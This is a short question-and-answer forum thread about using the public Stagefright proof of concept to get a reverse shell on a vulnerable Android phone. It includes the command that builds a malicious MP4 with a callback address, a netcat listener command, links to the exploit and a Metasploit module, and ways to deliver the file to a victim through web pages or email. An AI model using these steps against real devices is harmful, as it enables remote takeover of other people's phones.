Stagefright on Samsung Galaxy S3 running JB 4.3

Question

I've been doing a lot of research on Stagefright lately and it has been confirmed that many phone models running Android Lollipop and below are susceptible to the exploit.

So since my S3 did indeed turn out to be vulnerable to the exploit having used Zimperium's Stagefright Detector App I decided to put it to the test.

I downloaded Joshua Drake's stagefright code (mp4.py) and managed to successfully craft the malicious MP4 file by running:

python mp4.py -c 192.168.x.x -p 4444

c for LAN IP

p for port number

Now a lot of tutorials online say that before sending the MP4 file via MMS to the target phone I must setup a backdoor using netcat. However I have found that creating a backdoor using metasploit is far more effective in gaining full control over the phone.

I've heard that you could also embed the MP4 or other multimedia files to a webpage such that when a victim visits the webpage you could gain full control over the phone in the same way as mentioned above.

So how could this be achieved?

Answer 1

You must install netcat on your PC, not on the device. Set this netcat in listening mode for the chosen port:

nc -lp 4444

The device will get its netcat by playing the forged video file. You don't need MMS to have the video sent to the phone. You can embed the video on a web page, send it by email, or simply use adb push command to store it on the device. After that use the standard video player to play the video, and you will have control over the device from your PC command line.

Answer 2

Try the Metasploit module: https://github.com/rapid7/metasploit-framework/pull/4742

Also, from Josua Drake's original PoC https://github.com/jduck/cve-2015-1538-1

First, it is not a generic exploit. It's only been tested to work on a single device model. My target was the Galaxy Nexus device running Android 4.0.4 containing only a partial implementation of ASLR.

To use it on another device, you must know the libc.so function addresses for ROP chain gadgets.